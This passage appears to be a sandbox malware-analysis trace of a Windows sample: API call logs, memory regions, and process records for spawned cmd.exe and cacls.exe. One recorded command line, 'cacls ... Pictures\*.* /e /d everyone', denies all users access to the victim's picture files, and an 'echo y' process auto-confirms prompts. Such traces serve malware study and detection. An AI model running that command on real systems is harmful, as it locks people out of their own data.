LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0036.218] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0036.218] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0036.219] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0036.219] GetConsoleTitleW (in: lpConsoleTitle=0x434d78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.220] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0036.220] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0036.220] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0036.220] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0036.220] _wcsicmp (_String1="echo", _String2=")") returned 60 [0036.220] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0036.220] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0036.220] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0036.220] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0036.220] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0036.220] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0036.221] GetConsoleTitleW (in: lpConsoleTitle=0x1ef7f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.221] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.221] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.221] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.221] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.221] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.221] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.221] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.221] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.221] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.221] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.222] _vsnwprintf (in: _Buffer=0x12c8840, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef7ac | out: _Buffer="y\r\n") returned 3 [0036.222] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.222] GetFileType (hFile=0x28) returned 0x3 [0036.222] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.222] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="y\r\n", cchWideChar=-1, lpMultiByteStr=0x12b6840, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\r\n", lpUsedDefaultChar=0x0) returned 4 [0036.222] WriteFile (in: hFile=0x28, lpBuffer=0x12b6840*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0x1ef79c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesWritten=0x1ef79c*=0x3, lpOverlapped=0x0) returned 1 [0036.222] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.222] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0036.222] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.222] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0036.222] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.222] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.222] SetConsoleInputExeNameW () returned 0x1 [0036.222] GetConsoleOutputCP () returned 0x1b5 [0036.222] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.222] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.223] exit (_Code=0) Process: id = "19" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0xf72e000" os_pid = "0xba0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "cacls \"C:\\Users\\5JgHKoaOfdp\\Pictures\\*.*\" /e /d everyone" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 797 start_va = 0xb30000 end_va = 0xb39fff entry_point = 0xb30000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 798 start_va = 0xf90000 end_va = 0xfaffff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 799 start_va = 0xfb0000 end_va = 0xfb1fff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 800 start_va = 0xfc0000 end_va = 0xfcefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fc0000" filename = "" Region: id = 801 start_va = 0xfd0000 end_va = 0x100ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 802 start_va = 0x1010000 end_va = 0x104ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 803 start_va = 0x1050000 end_va = 0x1053fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001050000" filename = "" Region: id = 804 start_va = 0x1060000 end_va = 0x1060fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001060000" filename = "" Region: id = 805 start_va = 0x1070000 end_va = 0x1071fff entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 806 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 807 start_va = 0x7e7b0000 end_va = 0x7e7d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e7b0000" filename = "" Region: id = 808 start_va = 0x7e7db000 end_va = 0x7e7ddfff entry_point = 0x0 region_type = private name = "private_0x000000007e7db000" filename = "" Region: id = 809 start_va = 0x7e7de000 end_va = 0x7e7defff entry_point = 0x0 region_type = private name = "private_0x000000007e7de000" filename = "" Region: id = 810 start_va = 0x7e7df000 end_va = 0x7e7dffff entry_point = 0x0 region_type = private name = "private_0x000000007e7df000" filename = "" Region: id = 811 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 812 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 813 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 814 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 819 start_va = 0x10c0000 end_va = 0x10cffff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 820 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 821 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 822 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 832 start_va = 0xf90000 end_va = 0xf9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f90000" filename = "" Region: id = 833 start_va = 0xfa0000 end_va = 0xfa3fff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 834 start_va = 0xfb0000 end_va = 0xfb3fff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 835 start_va = 0x1080000 end_va = 0x1082fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001080000" filename = "" Region: id = 836 start_va = 0x1090000 end_va = 0x1090fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001090000" filename = "" Region: id = 837 start_va = 0x10a0000 end_va = 0x10a1fff entry_point = 0x10a0000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Region: id = 838 start_va = 0x10d0000 end_va = 0x114dfff entry_point = 0x10d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 839 start_va = 0x1250000 end_va = 0x134ffff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 840 start_va = 0x1480000 end_va = 0x148ffff entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 841 start_va = 0x1490000 end_va = 0x1764fff entry_point = 0x1490000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 842 start_va = 0x747f0000 end_va = 0x74814fff entry_point = 0x747f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 843 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 844 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 845 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 846 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 847 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 848 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 849 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 850 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 851 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 852 start_va = 0x7e6b0000 end_va = 0x7e7affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e6b0000" filename = "" Thread: id = 21 os_tid = 0xba4 Process: id = "20" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x136fc000" os_pid = "0xbc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 853 start_va = 0xdd0000 end_va = 0xdeffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 854 start_va = 0xdf0000 end_va = 0xdf1fff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 855 start_va = 0xe00000 end_va = 0xe0efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 856 start_va = 0xe10000 end_va = 0xe4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 857 start_va = 0xe50000 end_va = 0xf4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 858 start_va = 0xf50000 end_va = 0xf53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 859 start_va = 0xf60000 end_va = 0xf60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f60000" filename = "" Region: id = 860 start_va = 0xf70000 end_va = 0xf71fff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 861 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 862 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 863 start_va = 0x7e300000 end_va = 0x7e322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e300000" filename = "" Region: id = 864 start_va = 0x7e323000 end_va = 0x7e323fff entry_point = 0x0 region_type = private name = "private_0x000000007e323000" filename = "" Region: id = 865 start_va = 0x7e329000 end_va = 0x7e329fff entry_point = 0x0 region_type = private name = "private_0x000000007e329000" filename = "" Region: id = 866 start_va = 0x7e32d000 end_va = 0x7e32ffff entry_point = 0x0 region_type = private name = "private_0x000000007e32d000" filename = "" Region: id = 867 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 868 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 869 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 870 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 871 start_va = 0x1080000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 872 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 873 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 874 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 875 start_va = 0xdd0000 end_va = 0xddffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 876 start_va = 0xf80000 end_va = 0xffdfff entry_point = 0xf80000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 877 start_va = 0x1200000 end_va = 0x120ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 878 start_va = 0x13f0000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 879 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 880 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 881 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 882 start_va = 0x7e200000 end_va = 0x7e2fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e200000" filename = "" Region: id = 883 start_va = 0xde0000 end_va = 0xde3fff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Thread: id = 22 os_tid = 0xbc8 [0036.331] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0036.331] __set_app_type (_Type=0x1) [0036.331] __p__fmode () returned 0x76ea1768 [0036.331] __p__commode () returned 0x76ea176c [0036.331] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0036.331] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0036.331] GetCurrentThreadId () returned 0xbc8 [0036.331] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbc8) returned 0x30 [0036.331] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0036.331] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0036.331] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.333] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0036.333] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xf4fd38 | out: phkResult=0xf4fd38*=0x0) returned 0x2 [0036.333] VirtualQuery (in: lpAddress=0xf4fd47, lpBuffer=0xf4fce0, dwLength=0x1c | out: lpBuffer=0xf4fce0*(BaseAddress=0xf4f000, AllocationBase=0xe50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.333] VirtualQuery (in: lpAddress=0xe50000, lpBuffer=0xf4fce0, dwLength=0x1c | out: lpBuffer=0xf4fce0*(BaseAddress=0xe50000, AllocationBase=0xe50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0036.333] VirtualQuery (in: lpAddress=0xe51000, lpBuffer=0xf4fce0, dwLength=0x1c | out: lpBuffer=0xf4fce0*(BaseAddress=0xe51000, AllocationBase=0xe50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0036.334] VirtualQuery (in: lpAddress=0xe53000, lpBuffer=0xf4fce0, dwLength=0x1c | out: lpBuffer=0xf4fce0*(BaseAddress=0xe53000, AllocationBase=0xe50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.334] VirtualQuery (in: lpAddress=0xf50000, lpBuffer=0xf4fce0, dwLength=0x1c | out: lpBuffer=0xf4fce0*(BaseAddress=0xf50000, AllocationBase=0xf50000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0036.334] GetConsoleOutputCP () returned 0x1b5 [0036.334] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.334] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0036.334] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.334] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0036.334] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.334] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0036.334] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.334] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.334] GetEnvironmentStringsW () returned 0x13f4058* [0036.334] FreeEnvironmentStringsA (penv="=") returned 1 [0036.334] GetEnvironmentStringsW () returned 0x13f4058* [0036.334] FreeEnvironmentStringsA (penv="=") returned 1 [0036.335] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xf4ec88 | out: phkResult=0xf4ec88*=0x40) returned 0x0 [0036.335] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xf4ec90, lpData=0xf4ec94, lpcbData=0xf4ec8c*=0x1000 | out: lpType=0xf4ec90*=0x0, lpData=0xf4ec94*=0xec, lpcbData=0xf4ec8c*=0x1000) returned 0x2 [0036.335] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xf4ec90, lpData=0xf4ec94, lpcbData=0xf4ec8c*=0x1000 | out: lpType=0xf4ec90*=0x4, lpData=0xf4ec94*=0x1, lpcbData=0xf4ec8c*=0x4) returned 0x0 [0036.335] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xf4ec90, lpData=0xf4ec94, lpcbData=0xf4ec8c*=0x1000 | out: lpType=0xf4ec90*=0x0, lpData=0xf4ec94*=0x1, lpcbData=0xf4ec8c*=0x1000) returned 0x2 [0036.335] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xf4ec90, lpData=0xf4ec94, lpcbData=0xf4ec8c*=0x1000 | out: lpType=0xf4ec90*=0x4, lpData=0xf4ec94*=0x0, lpcbData=0xf4ec8c*=0x4) returned 0x0 [0036.335] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xf4ec90, lpData=0xf4ec94, lpcbData=0xf4ec8c*=0x1000 | out: lpType=0xf4ec90*=0x4, lpData=0xf4ec94*=0x40, lpcbData=0xf4ec8c*=0x4) returned 0x0 [0036.335] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xf4ec90, lpData=0xf4ec94, lpcbData=0xf4ec8c*=0x1000 | out: lpType=0xf4ec90*=0x4, lpData=0xf4ec94*=0x40, lpcbData=0xf4ec8c*=0x4) returned 0x0 [0036.335] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0xf4ec90, lpData=0xf4ec94, lpcbData=0xf4ec8c*=0x1000 | out: lpType=0xf4ec90*=0x0, lpData=0xf4ec94*=0x40, lpcbData=0xf4ec8c*=0x1000) returned 0x2 [0036.335] RegCloseKey (hKey=0x40) returned 0x0 [0036.335] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xf4ec88 | out: phkResult=0xf4ec88*=0x40) returned 0x0 [0036.335] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xf4ec90, lpData=0xf4ec94, lpcbData=0xf4ec8c*=0x1000 | out: lpType=0xf4ec90*=0x0, lpData=0xf4ec94*=0x40, lpcbData=0xf4ec8c*=0x1000) returned 0x2 [0036.335] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xf4ec90, lpData=0xf4ec94, lpcbData=0xf4ec8c*=0x1000 | out: lpType=0xf4ec90*=0x4, lpData=0xf4ec94*=0x1, lpcbData=0xf4ec8c*=0x4) returned 0x0 [0036.335] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xf4ec90, lpData=0xf4ec94, lpcbData=0xf4ec8c*=0x1000 | out: lpType=0xf4ec90*=0x0, lpData=0xf4ec94*=0x1, lpcbData=0xf4ec8c*=0x1000) returned 0x2 [0036.335] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xf4ec90, lpData=0xf4ec94, lpcbData=0xf4ec8c*=0x1000 | out: lpType=0xf4ec90*=0x4, lpData=0xf4ec94*=0x0, lpcbData=0xf4ec8c*=0x4) returned 0x0 [0036.335] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xf4ec90, lpData=0xf4ec94, lpcbData=0xf4ec8c*=0x1000 | out: lpType=0xf4ec90*=0x4, lpData=0xf4ec94*=0x9, lpcbData=0xf4ec8c*=0x4) returned 0x0 [0036.335] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xf4ec90, lpData=0xf4ec94, lpcbData=0xf4ec8c*=0x1000 | out: lpType=0xf4ec90*=0x4, lpData=0xf4ec94*=0x9, lpcbData=0xf4ec8c*=0x4) returned 0x0 [0036.335] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0xf4ec90, lpData=0xf4ec94, lpcbData=0xf4ec8c*=0x1000 | out: lpType=0xf4ec90*=0x0, lpData=0xf4ec94*=0x9, lpcbData=0xf4ec8c*=0x1000) returned 0x2 [0036.335] RegCloseKey (hKey=0x40) returned 0x0 [0036.335] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5004f [0036.335] srand (_Seed=0x5aa5004f) [0036.335] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0036.335] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0036.335] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.335] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x13f4060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0036.335] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.335] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.336] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 